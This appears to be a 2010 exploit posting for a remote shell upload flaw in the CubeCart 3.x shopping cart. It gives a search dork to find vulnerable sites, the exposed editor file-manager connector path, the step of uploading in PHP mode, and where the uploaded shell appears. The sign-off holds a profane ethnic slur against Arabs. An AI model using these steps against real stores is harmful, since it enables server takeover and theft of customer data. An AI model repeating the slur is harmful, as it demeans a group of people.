============================================================================== [»] CubeCart v 3.x Remote File Upload Vulnerability ============================================================================== [»] Title : [ CubeCart v 3.x Remote Shell Upload Vulnerability ] [»] Script : [ CubeCart v3.x ] [»] Language: [ PHP ] [»] Download: [ http://www.cubecart.com/ ] [»] Author : [ StunTMaN! - stunt.man@att.net } [»] Info : [ I'm S.W.A.T. | Old Persian Hacker | New Nickname | ;) ] [»] Date : [ 2010-12-13 ] [»] Version : [ 3.0.X and 3.2.x ] [»] Dork : [ "Powered by CubeCart 3.0.0" ] [»] Bug Info: [ Use Your Mind To How To Upload PHP Shell Script On This CMS ] ########################################################################### ===[ Exploit ]=== [»] http://server/admin/includes/rte/editor/filemanager/browser/default/connectors/test.html [»] Just use PHP Mode for uploading your files ===[ Upload To ]=== [»] http://server/images/File/[Shell] Greetz : All IRANIAN Hackerz ~ Cyber Hackerz Persian Gulf For Ever ~ Not Damn Mother F***er Arabians!! ###########################################################################